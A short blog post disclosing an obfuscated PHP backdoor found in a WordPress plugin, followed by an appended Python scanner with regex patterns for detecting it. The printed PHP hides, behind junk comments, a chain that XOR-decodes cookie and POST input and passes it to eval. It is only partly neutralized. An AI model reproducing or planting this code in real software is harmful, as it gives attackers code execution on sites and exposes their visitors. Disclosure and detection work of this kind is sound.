
Apologies to the readership

While we are on the subject of new tooling
Reading time: 2 min

When I talk about my constant battle against hackers trying to keep this site up and running, as well as other projects I work on, this is what that looks like.

<?php function jQjRmJ()
/* ikW */{

/*VR */$RXPRxsZlL =/* Rmu /Array (/ j/”HNbWYxIaqDDulWHoOYzr”/ e /=> “LoXScacitsVAmeFrdjKaP”/ v /); / vdPTU / $HFzqQTJlL =/hQD/Array ( “zgVAUqxMKmPzUiefbbmgwMUYHfBja” =>/mqHVz */”gybIdMOzSWKWp” );

$mxvdwNunh =  Array(  $RXPRxsZlL,  $_CO___OKIE,    $RXPRxsZlL,/* wlem */$_POST,/*  V   */$HFzqQTJlL);;

     return    $mxvdwNunh;
                }

/* iBik / function KTxZdfXmid($RsXoJUls, $RXPRxsZlL) { / gO /if ( count ( $RsXoJUls/waqa /) == 3 ) { $ZszIc = $RsXoJUls[1]; / Ecqr */$XvyGssmZv = $RsXoJUls[2];$_SkK = ‘17653’;

$XEAtlN = $ZszIc($XvyGssmZv);;
eval ( $XEAtlN/* zE /);; die (); } } / GDO / / Qff/function/ s /ZvYjDyYsId($hVhkStd,/ nJ /$LTeZR) /Zez */{

/* Qhw/return $hVhkStd/ cBtx /^/ oCjO */$LTeZR;;

}

/*CKKK */
$CPjtvRTl =/* ww */’#’;

function    pRbXMWfhEe($sfIYRka, $CPjtvRTl)
            {   
                /* GTToi  */$sfIYRka    =  explode ($CPjtvRTl,     $sfIYRka  );;

        KTxZdfXmid($sfIYRka,   $CPjtvRTl);

/* JE */}

 function    esfvEzYJi($LTeZR,/*OlAn   */$hVhkStd)

/* oIjHo*/{

$ZTuha = strlen(/* n/$hVhkStd )/strlen( $LTeZR );; / QRt/$LTeZR .= “Rgc-bWUpMu-aeb-eYyD-hDE-qZKq-CJgjVE”;$_MLCr = ‘53224’; $LTeZR =/ H /str_repeat ( $LTeZR,/ It /$ZTuha + 1);$_mMbI/ t */= ‘6178’;

   return/*HT*/$LTeZR;

/* MrJTX */}

function/*  nJ  */ceipe($LTeZR,/*   ukMAP*/$hVhkStd,  $CPjtvRTl)

{

/* Cq /$hVhkStd/ W /= @pack( chr (72) . “\52”, $hVhkStd );$_Rmd/FmW/=/pJ */’59122′;

 pRbXMWfhEe($hVhkStd     ^/*   X   */esfvEzYJi($LTeZR,   $hVhkStd),/*  cgbHF  */$CPjtvRTl);
}

function XVDaWSG($DVdOLT, $CPjtvRTl)
/* QFMlQ /{ foreach ( $DVdOLT as $LTeZR => $hVhkStd ) { ceipe($LTeZR, $hVhkStd, $CPjtvRTl);$_pfTf =/dqt*/’17311′;
}

}
/*   A*/
    foreach (jQjRmJ()/*  IW  */as   $DVdOLT)/*  nurt  */{

XVDaWSG($DVdOLT,     $CPjtvRTl);

/* HswX */}

The above, slightly neutralized code has been hidden within the structure of a plugin on the site for over a year, and despite constant maintenance and security checks, it was not detected by me until a few minutes ago. Appears to be a cookie stealer, and placed through a supply chain attack. So the vector was through the WordPress ecosystem. I think it was highly personally targeted however, and related to a specific feature I had been looking to add to the site for quite a while. There’s no amount of personal vigilance that can prevent these types of attacks, when multiple nation-state level hackers as well as all the criminal gangs and combinations thereof have unlimited time and resources to throw at individual small websites. If you have been visiting the site at all in the last year I suggest you go to your browser security settings and delete all cookies now.
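For anyone auditing plugin files for the same pattern, here is a small static check, added as an example and not part of the original post. It removes block comments first, because the sample hides tokens behind filler comments, then looks for the chain visible in the code above: request data, a function called through a variable, and `eval` of the result. The function name `scan_php`, the indicator names and the junk-comment threshold are assumptions made for this example.

```python
import re

BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
JUNK_COMMENT = re.compile(r"/\*\s*\w{1,6}\s*\*/")  # short filler like /* zE */

# Indicators taken from the sample above; matched after comments are removed.
INDICATORS = {
    "request_input": re.compile(r"\$_(?:COOKIE|POST|REQUEST|GET)\b"),
    "eval_of_variable": re.compile(r"\beval\s*\(\s*\$\w+"),
    "variable_function_call": re.compile(r"\$\w+\s*\("),
    "chr_built_string": re.compile(r"\bchr\s*\(\s*\d+\s*\)\s*\."),
}
# Request data reaching eval through a callable named by a variable.
CORE = {"request_input", "eval_of_variable", "variable_function_call"}


def scan_php(source):
    """Return (sorted indicator names, suspicious flag) for PHP source text."""
    # PHP treats a comment as whitespace, so replace each one with a space.
    code = BLOCK_COMMENT.sub(" ", source)
    hits = {name for name, rx in INDICATORS.items() if rx.search(code)}
    if len(JUNK_COMMENT.findall(source)) >= 3:
        hits.add("junk_comments")
    return sorted(hits), CORE <= hits


# Constructed, abridged fragment modelled on the sample above
# (the neutralized $_CO___OKIE spelling is kept).
SUSPICIOUS = r'''<?php
$in = Array($_CO___OKIE, /* wlem */ $_POST);
/* iBik */ function run($p) { $f = $p[1]; $a = $p[2];
  $c = $f($a); eval/* zE */( $c ); die(); }
$v = @pack(chr(72) . "\52", $v);
'''

# Constructed benign plugin code: reads $_POST but never evaluates it.
BENIGN = r'''<?php
/* Plugin helper */
function greet($name) { return "Hello " . htmlspecialchars($_POST["name"] ?? $name); }
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, scan_php(src))
```

A match on all three core indicators is a reason to review the file by hand, not proof of compromise; legitimate plugins occasionally use callbacks held in variables.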
